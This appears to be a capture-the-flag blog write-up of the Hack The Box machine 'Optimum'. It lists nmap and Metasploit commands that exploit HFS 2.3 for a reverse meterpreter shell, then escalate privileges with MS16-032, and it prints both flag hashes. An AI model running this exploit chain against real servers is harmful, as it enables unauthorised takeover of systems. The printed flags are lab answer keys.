top of page

Optimum

As usual, let's start with nmap

nmap -sV -sC -p- 10.129.170.240

We can see it is using HFS 2.3. Let's google "HFS 2.3 exploit" and see if we find an exploit available.


Let's follow these steps in the article.


msfconsole
use exploit/windows/http/rejetto_hfs_exec

show options

set RHOSTS 10.129.170.240
set LHOST 10.10.14.21

exploit

getuid

sysinfo

shell

dir

We find a text file called user.txt.txt

Let's open using:

type user.txt.txt

d0c39409d7b994a9a1389ebf38ef5f73


Congratulations! You got the user flag!


Let's now look for the root flag

cd ..
cd ..
dir

cd Administrator

Access is denied


Return to the meterpreter shell by typing:

exit


Privilege Escalation


Let's use Lester (local exploit suggestor) from Metasploit. This will scan the target for vulnervabilities.


To run Lester, we use:

run post/multi/recon/local_exploit_suggester

There are a couple of exploits we could use but I tried exploit/windows/local/bypassuac_eventvwr and it didn't work.


We will use exploit/windows/local/ms16_032_secondary_logon_handle_privesc


But first let's look at the processes running using

ps

Let's migrate to explorer.exe with PID 1988

migrate 1988

background

This is giving us the session id which is 1 (we will need that later)


use exploit/windows/local/ms16_032_secondary_logon_handle_privesc


show options

set SESSION 1
set LHOST 10.10.14.21

exploit


shell

cd C:\Users\Administrator\Desktop
dir
type root.txt

51ed1b36553c8461f4552c2e92b3eeed


Congratulations! You got the root flag!

203 views0 comments

Recent Posts

See All

Previse

Backdoor

Lame

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page